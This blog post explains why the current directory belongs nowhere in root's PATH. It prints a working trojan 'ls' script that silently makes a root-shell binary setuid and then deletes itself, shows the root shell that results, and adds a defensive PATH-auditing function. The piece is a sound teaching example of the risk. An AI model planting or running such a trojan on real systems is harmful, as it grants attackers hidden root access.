I recently had a discussion with someone who requested that I put the current working directory, ., in their PATH. Luckily, they did not know how to do this themselves. Here is why it's absolutely unacceptable to put the CWD in your PATH:

Let's say a malicious user, brock, has placed two files in the /tmp directory:

[root@www tmp]# ls -l
-rwxr-xr-x 1 brock brock 4667 Dec 8 07:54 brock.lock
-rwxr-xr-x 1 brock brock 246 Dec 8 08:04 ls

Also, the user root has placed . in their PATH:

[root@www tmp]# echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
[root@www tmp]# export PATH=.:$PATH
[root@www tmp]# echo $PATH
.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin

The file /tmp/brock.lock is named as such to seem harmless. The ls file should attract attention, but probably will not on a busy host. Given the conditions above, . is searched before /bin, so when root is in the /tmp directory, /tmp/ls will execute instead of /bin/ls. The contents of /tmp/ls are like so:

[root@www tmp]# cat /tmp/ls
#!/bin/bash
if [ `whoami` == root ]
then
  if [ -f /tmp/brock.lock ]
  then
  chmod 4755 /tmp/brock.lock
  chown root:root /tmp/brock.lock
  mv /tmp/brock.lock /home/brock/
  rm /tmp/ls
  fi
fi
/bin/ls "$@"

This script sets the setuid bit on the /tmp/brock.lock file, changes its ownership to root, moves the file to brock's home directory, deletes itself, and finally runs the expected command. Thus, the root user will NEVER know they executed the script instead of /bin/ls! Look:

[root@www tmp]# pwd
/tmp
[root@www tmp]# ls -l
[root@www tmp]# ls -l /home/brock/
-rwsr-xr-x 1 root root 4667 Dec 8 07:54 brock.lock

The script executed, so the brock.lock file now has the setuid bit and is owned by root. It is also executable by all users. What happens now? The brock.lock file is a specially crafted binary which, when run with root privileges (that is, with the setuid bit set and root ownership), spawns a root shell. root has just given root access to brock without knowing it. The host has been owned. See below:

[root@www tmp]# su - brock
brock@www:~$ ./brock.lock
sh-3.00# whoami
root
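A defender's check for this, added here as an example and not code from the original post: a POSIX sh function that walks a PATH string and flags every entry the shell would resolve against the current working directory. It also catches an empty entry (a leading or trailing colon, or two adjacent colons), which the shell searches as the current directory exactly like ., and it reports each entry's position, since an entry placed last is still searched whenever no earlier directory has the command. A second function prints the PATH with those entries removed. The sample PATH values are constructed.

```shell
#!/bin/sh
# Added example, not code from the original post.
# audit_path PATHSTRING
#   Walks the colon-separated PATH string and prints one line per entry that
#   the shell would resolve against the current working directory:
#     "<position>:<entry>:<reason>"
#   An empty entry (leading colon, trailing colon, or "::") is searched as the
#   current directory just like ".", so it is flagged as well.
#   Returns the number of flagged entries (0 means the PATH is clean).
audit_path() {
    rest="$1:"          # trailing sentinel so the last entry is handled too
    pos=0
    bad=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text up to the next colon
        rest=${rest#*:}     # drop that text plus the colon
        pos=$((pos + 1))
        case "$entry" in
            "") reason="empty entry, searched as the current directory" ;;
            .)  reason="explicit current directory" ;;
            /*) reason="" ;;                      # absolute path: fine here
            *)  reason="relative path, resolved against the current directory" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s:%s:%s\n' "$pos" "$entry" "$reason"
            bad=$((bad + 1))
        fi
    done
    return "$bad"
}

# clean_path PATHSTRING
#   Prints PATHSTRING with every non-absolute entry removed, which is the
#   fix for a PATH that audit_path complains about.
clean_path() {
    rest="$1:"
    out=""
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            /*) out="${out:+$out:}$entry" ;;
        esac
    done
    printf '%s\n' "$out"
}

# Constructed sample: root's PATH from the post after "export PATH=.:$PATH".
audit_path '.:/usr/local/sbin:/usr/local/bin:/sbin:/bin' || echo "risky entries: $?"
```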

One Response to “Never ever ever put the CWD in your PATH”

  1. Sitwon Says:

    On Slackware, CWD is added to the path by default for all non-root users, but it’s the last entry so the current directory is only checked as a last resort.

    In your example, if you had done PATH=$PATH:. it would have found /bin/ls first and the malicious ls wouldn’t have been executed.

If Wordpress eats your comment (shell output, loops, ex..) brock (at) gmail dot com.